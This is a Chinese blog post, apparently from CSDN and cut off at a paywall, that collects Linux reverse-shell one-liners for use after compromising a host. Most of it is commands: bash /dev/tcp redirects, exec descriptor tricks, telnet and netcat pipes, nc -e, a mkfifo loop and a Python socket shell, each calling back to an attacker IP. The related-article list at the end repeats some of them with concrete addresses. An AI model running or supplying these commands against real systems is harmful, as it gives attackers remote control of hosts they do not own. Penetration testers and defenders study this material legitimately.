经验分享 | 常用linux反弹shell合集

最新推荐文章于 2024-05-06 12:47:48 发布
VIP文章 最新推荐文章于 2024-05-06 12:47:48 发布
阅读量876 收藏 3
点赞数 1
文章标签: linux shell 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Uguardsec/article/details/113104578
版权

一、前言

当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。

二、反弹方法

攻击机:192.168.3.43
靶机:192.168.1.21 、192.168.249.12

1. Bash反弹

1.1 方法一

攻击者主机上执行监听:
nc -lvvp port

目标主机上执行:
bash -i >& /dev/tcp/x.x.x.x/port 0>&1
在这里插入图片描述
#bash -i 打开一个交互的bash
#>& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
#0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

注:/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

inux shell下常用的文件描述符是:
1.标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
2.标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
3.标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
另外由于不同Linux发行版之间的差异,该命令在某些系统上可能并不适用。

1.2 方法二

0<&196;exec 196<>/dev/tcp/x.x.x.x/4444; sh <&196 >&196 2>&196
在这里插入图片描述
/bin/bash -i > /dev/tcp/x.x.x.x/8080 0<&1 2>&1

1.3 方法三

exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
在这里插入图片描述
2. telnet反弹

2.1 方法一

攻击者主机上打开两个终端分别执行监听:
nc -lvvp 4444
nc -lvvp 5555

目标主机中执行:
telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555
在这里插入图片描述
监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip
反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。

2.2 方法二

mknod backpipe p && telnet X.X.X.X 4444 0<backpipe | /bin/bash 1>backpipe
在这里插入图片描述
3. nc(netcat)反弹

攻击者主机上执行监听命令:
nc -lvp port

目标主机上执行:
nc -e /bin/bash x.x.x.x port
在这里插入图片描述
如果目标主机linux发行版本没有 -e 参数,还有以下几种方式:
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f
在这里插入图片描述
注:mkfifo 命令的作用是创建FIFO特殊文件,通常也称为命名管道,FIFO文件在磁盘上没有数据块,仅用来标识内核中的一条通道,各进程可以打开FIFO文件进行read/write,实际上是在读写内核通道(根本原因在于FIFO文件结构体所指向的read、write函数和常规文件不一样),这样就实现了进程间通信

nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。

4. 常见脚本反弹

4.1 python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“x.x.x.x”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);’

在这里插入图片描述
4.2 python 标准虚拟终端获取

我们通过各种方式获取的shell经常不稳定或者没有交互界面的原因,往往都是因为我们获取的shell不是标准的虚拟终端,此时我们其实可以借助于python来获取一个标准的虚拟终端环境。python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。

(1) python 一句话获取标准shell
使用python 一句话获取标准shell的具体命令如下:
python -c “import pty;pty.spawn(’/bin/bash’)”
命令详解:python 默认就包含有一个pty的标准库。
在这里插入图片描述
(2) 实例演示
具体(1)开启监听;(2)反弹shell;(3)会话建立的过程这里不在重复演示了,这里直接贴出笔者获取到反弹shell后的问题后,如何通过python获取标准shell的过程截图展现如下。
例子1:

最低0.47元/天 解锁文章
天磊卫士官方
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
socat-1.7.3.2
05-18
socat,是linux下的一个工具,其功能与有“瑞士军刀”之称的netcat类似,不过据说可以看做netcat的加强版。的确如此,它有一些netcat所不具备却又很有需求的功能,例如ssl连接这种。nc可能是因为比较久没有维护,确实显得有些陈旧了。
关于内穿透真实案例讲解
qq_36585338的博客
02-13 758
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是络概念的客户端与服务端的角色反转。 Kali 0x006内穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
远程控制-反弹木马设计全部源码
03-26
远程控制-反弹木马设计全部源码
渗透之——内转发(反弹shell、端口、代理)
wsnbbz的博客
04-03 9576
目的 渗透测试中,我们往往会面对十分复杂的内环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
Windows 反弹shell方法
weixin_53747497的博客
07-12 2066
正向shell : 控制端主动发起连接请求去连接被控制端,中间络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1053
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Struts2远程代码执行漏洞
m0_63241485的博客
08-16 891
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...
Hacker Tools
xyqzki的专栏
09-04 1347
1. Metasploit 扫漏洞 2. portmon 查端口通信
云服务器+nps+msf反弹shell小技巧
qq_45414878的博客
02-04 1440
vps+nps+msf反弹shell小技巧环境:vpsnps配置msf1配置msf2配置 有时候我们在做实验或者真实环境测试的时候存在漏洞的服务器在外,而我们的攻击机kali在内,在需要msf接收shell的时候不知道该怎么接收,也接收不了(外ip->内ip,是不可能找得到的)。此时我们就需要一个vps(有外IP的云主机)再安装一个nps(内穿透的软件,github上面有,安装教程也在github上面,安装完毕后nps的目录在/etc/nps)。然后具体操作如下 环境: vps:123.5
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
分享9个实战及面试常用Linux Shell脚本编写
09-15
主要介绍了9个实战及面试常用Shell脚本编写,非常不错,具有一定的收藏价值,需要的朋友可以参考下
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4817
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1479
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
linux反弹shell方法
weixin_53747497的博客
07-12 1709
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
【技术分享linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
djph26741的博客
07-09 1039
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢?1.某客户机中了你的马,但是它在局域内,你...
各种反弹shell方式
m0_58606546的博客
11-17 2251
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
linux下的调试工具gdb的详细使用介绍
最新发布
qq_75270497的博客
05-06 1010
详细介绍在linux下使用gdb的方法,每个步骤都举例说明,适合复习和新手入门,希望能为能够帮助到大家。
linux反弹shell检测
08-22
Linux 反弹 shell 是一种攻击技术,攻击者利用漏洞或恶意代码将远程 shell 注入受害者的系统,从而获取对系统的控制权。为了检测 Linux 反弹 shell,可以采取以下几种方法: 1. 监控络活动:使用络监控工具,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值